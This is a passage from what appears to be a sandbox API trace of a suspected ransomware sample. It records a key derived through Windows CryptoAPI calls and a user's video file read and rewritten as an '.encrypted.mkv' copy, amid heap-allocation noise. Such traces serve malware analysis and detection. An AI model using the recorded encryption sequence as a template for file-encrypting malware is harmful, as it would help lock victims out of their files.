lpsz="__CRYPT_CONTEXT") returned 0xf [0042.252] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.252] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0042.252] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0042.252] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.252] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.253] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0042.253] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.253] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.253] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0042.253] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.253] CryptDestroyHash (hHash=0x7c2240) returned 1 [0042.253] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\dqh_ruypmijj4.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.253] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.253] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0042.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0042.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0042.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.254] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.encrypted.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\dqh_ruypmijj4.encrypted.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0042.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0042.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0042.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0042.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.254] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0042.254] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xf447, lpOverlapped=0x0) returned 1 [0042.257] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0042.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf447) returned 0xac2018 [0042.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0042.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0042.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0042.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf447) returned 0xad1468 [0042.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.259] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf447) returned 0xac2018 [0042.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0042.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.260] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0042.260] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.260] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0042.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0042.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf447) returned 0xac2018 [0042.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0042.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0042.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0042.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0042.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf447) returned 0x935008 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0042.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0042.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0042.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0042.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0042.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.264] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0042.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2b8 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0042.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd18 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0042.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.264] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0042.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.265] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0042.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0042.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0042.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0042.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.266] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0042.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0042.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0042.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0042.267] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0042.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.267] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.267] HeapFree (in: 